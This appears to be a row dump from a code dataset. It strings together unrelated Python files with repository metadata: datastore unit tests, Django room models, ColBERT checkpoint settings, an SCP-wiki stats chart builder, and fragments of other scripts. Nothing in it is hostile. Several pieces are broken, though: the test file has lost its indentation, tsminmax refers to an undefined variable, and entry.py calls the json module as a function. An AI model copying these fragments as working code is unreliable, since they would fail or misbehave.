def error(self, *args, **kwargs): pass
def critical(self, *args, **kwargs): pass
s1 = LoggingDatastore(DictDatastore(), logger=NullLogger('null'))
s2 = LoggingDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestKeyTransformDatastore(TestDatastore):
def test_simple(self):
from ..basic import KeyTransformDatastore
s1 = KeyTransformDatastore(DictDatastore())
s2 = KeyTransformDatastore(DictDatastore())
s3 = KeyTransformDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_reverse_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return key.reverse
ds = DictDatastore()
kt = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('/a/b/c')
k2 = Key('/c/b/a')
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
ds.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertEqual(kt.get(k2), 'abc')
kt.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertEqual(kt.get(k2), 'abc')
ds.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertFalse(kt.contains(k2))
kt.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
def test_lowercase_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return Key(str(key).lower())
ds = DictDatastore()
lds = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestLowercaseKeyDatastore(TestDatastore):
def test_simple(self):
from ..basic import LowercaseKeyDatastore
s1 = LowercaseKeyDatastore(DictDatastore())
s2 = LowercaseKeyDatastore(DictDatastore())
s3 = LowercaseKeyDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_lowercase(self):
from ..basic import LowercaseKeyDatastore
ds = DictDatastore()
lds = LowercaseKeyDatastore(ds)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestNamespaceDatastore(TestDatastore):
def test_simple(self):
from ..basic import NamespaceDatastore
s1 = NamespaceDatastore(Key('a'), DictDatastore())
s2 = NamespaceDatastore(Key('b'), DictDatastore())
s3 = NamespaceDatastore(Key('c'), DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_namespace(self):
from ..basic import NamespaceDatastore
k1 = Key('/c/d')
k2 = Key('/a/b')
k3 = Key('/a/b/c/d')
ds = DictDatastore()
nd = NamespaceDatastore(k2, ds)
ds.put(k1, 'cd')
ds.put(k3, 'abcd')
self.assertEqual(ds.get(k1), 'cd')
self.assertFalse(ds.contains(k2))
self.assertEqual(ds.get(k3), 'abcd')
self.assertEqual(nd.get(k1), 'abcd')
self.assertFalse(nd.contains(k2))
self.assertFalse(nd.contains(k3))
def test(key, val):
nd.put(key, val)
self.assertEqual(nd.get(key), val)
self.assertFalse(ds.contains(key))
self.assertFalse(nd.contains(k2.child(key)))
self.assertEqual(ds.get(k2.child(key)), val)
for i in range(0, 10):
test(Key(str(i)), 'val%d' % i)
class TestNestedPathDatastore(TestDatastore):
def test_simple(self):
from ..basic import NestedPathDatastore
s1 = NestedPathDatastore(DictDatastore())
s2 = NestedPathDatastore(DictDatastore(), depth=2)
s3 = NestedPathDatastore(DictDatastore(), length=2)
s4 = NestedPathDatastore(DictDatastore(), length=1, depth=2)
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_nested_path(self):
from ..basic import NestedPathDatastore
nested_path = NestedPathDatastore.nestedPath
def test(depth, length, expected):
nested = nested_path('abcdefghijk', depth, length)
self.assertEqual(nested, expected)
test(3, 2, 'ab/cd/ef')
test(4, 2, 'ab/cd/ef/gh')
test(3, 4, 'abcd/efgh/ijk')
test(1, 4, 'abcd')
test(3, 10, 'abcdefghij/k')
def subtest_nested_path_ds(self, **kwargs):
from ..basic import NestedPathDatastore
k1 = kwargs.pop('k1')
k2 = kwargs.pop('k2')
k3 = kwargs.pop('k3')
k4 = kwargs.pop('k4')
ds = DictDatastore()
np = NestedPathDatastore(ds, **kwargs)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
np.put(k1, k1)
np.put(k2, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
np.delete(k1)
np.delete(k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
ds.put(k3, k1)
ds.put(k4, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
ds.delete(k3)
ds.delete(k4)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
def test_3_2(self):
opts = {}
opts['k1'] = Key('/abcdefghijk')
opts['k2'] = Key('/abcdefghijki')
opts['k3'] = Key('/ab/cd/ef/abcdefghijk')
opts['k4'] = Key('/ab/cd/ef/abcdefghijki')
opts['depth'] = 3
opts['length'] = 2
self.subtest_nested_path_ds(**opts)
def test_5_3(self):
opts = {}
opts['k1'] = Key('/abcdefghijk')
opts['k2'] = Key('/abcdefghijki')
opts['k3'] = Key('/abc/def/ghi/jka/bcd/abcdefghijk')
opts['k4'] = Key('/abc/def/ghi/jki/abc/abcdefghijki')
opts['depth'] = 5
opts['length'] = 3
self.subtest_nested_path_ds(**opts)
def test_keyfn(self):
opts = {}
opts['k1'] = Key('/abcdefghijk')
opts['k2'] = Key('/abcdefghijki')
opts['k3'] = Key('/kj/ih/gf/abcdefghijk')
opts['k4'] = Key('/ik/ji/hg/abcdefghijki')
opts['depth'] = 3
opts['length'] = 2
opts['keyfn'] = lambda key: key.name[::-1]
self.subtest_nested_path_ds(**opts)
class TestSymlinkDatastore(TestDatastore):
def test_simple(self):
from ..basic import SymlinkDatastore
s1 = SymlinkDatastore(DictDatastore())
s2 = SymlinkDatastore(DictDatastore())
s3 = SymlinkDatastore(DictDatastore())
s4 = SymlinkDatastore(DictDatastore())
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_symlink_basic(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
def test_symlink_internals(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
c = Key('/C')
d = Key('/D')
lva = sds._link_value_for_key(a)
lvb = sds._link_value_for_key(b)
lvc = sds._link_value_for_key(c)
lvd = sds._link_value_for_key(d)
# helper to check queries
sds_query = lambda: list(sds.query(Query(Key('/'))))
dds_query = lambda: list(dds.query(Query(Key('/'))))
# ensure _link_value_for_key and _link_for_value work
self.assertEqual(lva, str(a.child(sds.sentinel)))
self.assertEqual(a, sds._link_for_value(lva))
# adding a value should work like usual
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [1])
self.assertEqual(dds_query(), [1])
# _follow_link(sds._link_value_for_key(a)) should == get(a)
self.assertEqual(sds._follow_link(lva), 1)
self.assertEqual(list(sds._follow_link_gen([lva])), [1])
# linking keys should work
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [1, 1])
self.assertEqual(dds_query(), [1, lva])
# changing link should affect source
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 2)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [2, 2])
self.assertEqual(dds_query(), [2, lva])
# deleting source should affect link
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), None)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [None])
self.assertEqual(dds_query(), [lva])
# putting back source should yield working link
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# deleting link should not affect source
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [3])
self.assertEqual(dds_query(), [3])
# linking should bring back to normal
sds.link(a, b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# Adding another link should not affect things.
sds.link(a, c)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lva)
self.assertEqual(sds_query(), [3, 3, 3])
self.assertEqual(dds_query(), [3, lva, lva])
# linking should be transitive
sds.link(b, c)
sds.link(c, d)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(d), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(sds.get(a), sds.get(d))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lvb)
self.assertEqual(dds.get(d), lvc)
self.assertEqual(sds_query(), [3, 3, 3, 3])
self.assertEqual(set(dds_query()), set([3, lva, lvb, lvc]))
self.assertRaises(AssertionError, sds.link, d, a)
def test_symlink_recursive(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds1 = SymlinkDatastore(dds)
sds2 = SymlinkDatastore(sds1)
a = Key('/A')
b = Key('/B')
sds2.put(a, 1)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.put(b, 2)
self.assertEqual(sds2.get(a), 2)
self.assertEqual(sds2.get(b), 2)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.delete(a)
self.assertEqual(sds2.get(a), None)
self.assertEqual(sds2.get(b), None)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.put(a, 3)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), 3)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.delete(b)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
class TestDirectoryDatastore(TestDatastore):
def test_simple(self):
from ..basic import DirectoryDatastore
s1 = DirectoryDatastore(DictDatastore())
s2 = DirectoryDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestDatastoreCollection(TestDatastore):
def test_tiered(self):
from ..basic import TieredDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
ts = TieredDatastore([s1, s2, s3])
k1 = Key('1')
k2 = Key('2')
k3 = Key('3')
s1.put(k1, '1')
s2.put(k2, '2')
s3.put(k3, '3')
self.assertTrue(s1.contains(k1))
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertTrue(ts.contains(k1))
self.assertEqual(ts.get(k1), '1')
self.assertEqual(s1.get(k1), '1')
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertFalse(s1.contains(k2))
self.assertTrue(s2.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertTrue(ts.contains(k2))
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s1.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertEqual(ts.get(k2), '2')
self.assertEqual(s1.get(k2), '2')
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s3.contains(k2))
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertTrue(s3.contains(k3))
self.assertTrue(ts.contains(k3))
self.assertEqual(s3.get(k3), '3')
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertEqual(ts.get(k3), '3')
self.assertEqual(s1.get(k3), '3')
self.assertEqual(s2.get(k3), '3')
self.assertEqual(s3.get(k3), '3')
ts.delete(k1)
ts.delete(k2)
ts.delete(k3)
self.assertFalse(ts.contains(k1))
self.assertFalse(ts.contains(k2))
self.assertFalse(ts.contains(k3))
self.subtest_simple([ts])
def test_sharded(self, numelems=1000):
from ..basic import ShardedDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
s4 = DictDatastore()
s5 = DictDatastore()
stores = [s1, s2, s3, s4, s5]
hash = lambda key: int(key.name) * len(stores) / numelems
sharded = ShardedDatastore(stores, shardingfn=hash)
sumlens = lambda stores: sum(map(lambda s: len(s), stores))
def checkFor(key, value, sharded, shard=None):
correct_shard = sharded._stores[hash(key) % len(sharded._stores)]
for s in sharded._stores:
if shard and s == shard:
self.assertTrue(s.contains(key))
self.assertEqual(s.get(key), value)
else:
self.assertFalse(s.contains(key))
if correct_shard == shard:
self.assertTrue(sharded.contains(key))
self.assertEqual(sharded.get(key), value)
else:
self.assertFalse(sharded.contains(key))
self.assertEqual(sumlens(stores), 0)
# test all correct.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for i in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
sharded.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
if value % 2 == 0:
shard.delete(key)
else:
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
# try out adding it to the wrong shards.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this wont do anything
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.delete(key)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.put(key, value)
incorrect_shard.delete(key)
checkFor(key, value, sharded, correct_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, correct_shard)
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
self.subtest_simple([sharded])
if __name__ == '__main__':
unittest.main()
| [] |
Neisvestney/SentSyncServer | rooms/models.py | 45e9572b6c9b274ed2cbad28749fcb2154c98757 | from django.db import models
class Room(models.Model):
code = models.CharField('Code', max_length=128)
tab_url = models.CharField('Tab url', max_length=512, default='', blank=True)
def to_dict(self):
return {
'users': [u.to_dict() for u in self.users.all()],
'tabUrl': self.tab_url
}
def __str__(self):
return f'Room {self.code}'
class RoomUser(models.Model):
room = models.ForeignKey(Room, related_name='users', on_delete=models.CASCADE)
username = models.CharField('Username', max_length=128, default="user")
host = models.BooleanField('Is host')
def to_dict(self):
return {
'id': self.id,
'username': self.username,
'isHost': self.host,
}
def __str__(self):
return f'{self.username} ({self.id})'
| [((68, 108), 'django.db.models.CharField', 'models.CharField', (['"""Code"""'], {'max_length': '(128)'}), "('Code', max_length=128)\n", (84, 108), False, 'from django.db import models\n'), ((123, 190), 'django.db.models.CharField', 'models.CharField', (['"""Tab url"""'], {'max_length': '(512)', 'default': '""""""', 'blank': '(True)'}), "('Tab url', max_length=512, default='', blank=True)\n", (139, 190), False, 'from django.db import models\n'), ((441, 512), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Room'], {'related_name': '"""users"""', 'on_delete': 'models.CASCADE'}), "(Room, related_name='users', on_delete=models.CASCADE)\n", (458, 512), False, 'from django.db import models\n'), ((529, 589), 'django.db.models.CharField', 'models.CharField', (['"""Username"""'], {'max_length': '(128)', 'default': '"""user"""'}), "('Username', max_length=128, default='user')\n", (545, 589), False, 'from django.db import models\n'), ((601, 631), 'django.db.models.BooleanField', 'models.BooleanField', (['"""Is host"""'], {}), "('Is host')\n", (620, 631), False, 'from django.db import models\n')] |
techthiyanes/ColBERT | colbert/parameters.py | 6493193b98d95595f15cfc375fed2f0b24df4f83 | import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
| [((23, 43), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (35, 43), False, 'import torch\n')] |
aburgd/sheila | jarvis/stats.py | 556cf3e4a6992b8ba609ba281f5a3657cd91e709 | #!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
tags = [html('b', t) if t in 'scp tale hub admin author' else t
for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url
| [((5816, 5847), 'pyscp.wikidot.Wiki', 'pyscp.wikidot.Wiki', (['"""scp-stats"""'], {}), "('scp-stats')\n", (5834, 5847), False, 'import pyscp\n'), ((2134, 2162), 'textwrap.indent', 'textwrap.indent', (['row', '""" """'], {}), "(row, ' ')\n", (2149, 2162), False, 'import textwrap\n'), ((2215, 2249), 'textwrap.indent', 'textwrap.indent', (['row', "(' ' * indent)"], {}), "(row, ' ' * indent)\n", (2230, 2249), False, 'import textwrap\n'), ((4435, 4460), 'dominate.tags.td', 'dt.td', (['p.title'], {'colspan': '(2)'}), '(p.title, colspan=2)\n', (4440, 4460), True, 'from dominate import tags as dt\n'), ((4485, 4501), 'dominate.tags.td', 'dt.td', (['"""Rating:"""'], {}), "('Rating:')\n", (4490, 4501), True, 'from dominate import tags as dt\n'), ((4503, 4518), 'dominate.tags.td', 'dt.td', (['p.rating'], {}), '(p.rating)\n', (4508, 4518), True, 'from dominate import tags as dt\n'), ((4543, 4560), 'dominate.tags.td', 'dt.td', (['"""Created:"""'], {}), "('Created:')\n", (4548, 4560), True, 'from dominate import tags as dt\n'), ((4562, 4573), 'dominate.tags.td', 'dt.td', (['date'], {}), '(date)\n', (4567, 4573), True, 'from dominate import tags as dt\n')] |
Allenyou1126/allenyou-acme.sh | entry.py | 2f5fa606cb0a66ded49d75a98d0dc47adc68c87c | #!/usr/bin/env python3
import json
from allenyoucert import Cert
def main():
certList = list()
a = json()
main()
| [((109, 115), 'json', 'json', ([], {}), '()\n', (113, 115), False, 'import json\n')] |
quantmind/dynts | dynts/lib/fallback/simplefunc.py | 21ac57c648bfec402fa6b1fe569496cf098fb5e8 |
from .common import *
def tsminmax(v):
mv = NaN
xv = NaN
for v in x:
if x == x:
if mv == mv:
mv = min(mv,x)
else:
mv = x
if xv == xv:
xv = max(xv,x)
else:
xv = x
return (mv,xv) | [] |
lcsm29/edx-harvard-cs50 | week9/finance/application.py | 283f49bd6a9e4b8497e2b397d766b64527b4786b | import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
